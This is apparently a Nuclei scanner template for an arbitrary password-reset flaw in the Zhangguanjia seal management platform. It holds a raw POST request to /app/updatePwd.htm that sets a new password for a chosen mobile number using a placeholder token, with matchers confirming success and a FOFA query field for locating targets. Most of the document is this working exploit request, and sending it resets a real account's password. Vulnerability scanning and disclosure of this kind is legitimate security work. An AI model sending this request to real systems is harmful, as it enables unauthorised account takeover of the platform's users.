id: zhangin-updatePwd-resetpassword
info:
  name: 章管家印章智慧管理平台 updatePwd.htm 任意账号密码重置漏洞
  author: leadlife
  severity: high
  description: 章管家是上海建业信息科技股份有限公司推出的一款针对传统印章风险管理提供的整套解决方案的工具。
  reference: 
    - https://github.com/wy876/POC/blob/c19942e30121f116548ca14c0375ba6c8560afeb/%E7%AB%A0%E7%AE%A1%E5%AE%B6updatePwd.htm%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: app="test"
  tags: zhanggin,resetpass


http:
  - raw:
      - |
        POST /app/updatePwd.htm HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.31.0
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: close
        Content-Length: 87
        Content-Type: application/x-www-form-urlencoded

        mobile=18888888888&newPassword=12312dsa12&equipmentName=xxxxxx&version=4.0.0&token=dingtalk_token

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,'修改成功')
        condition: and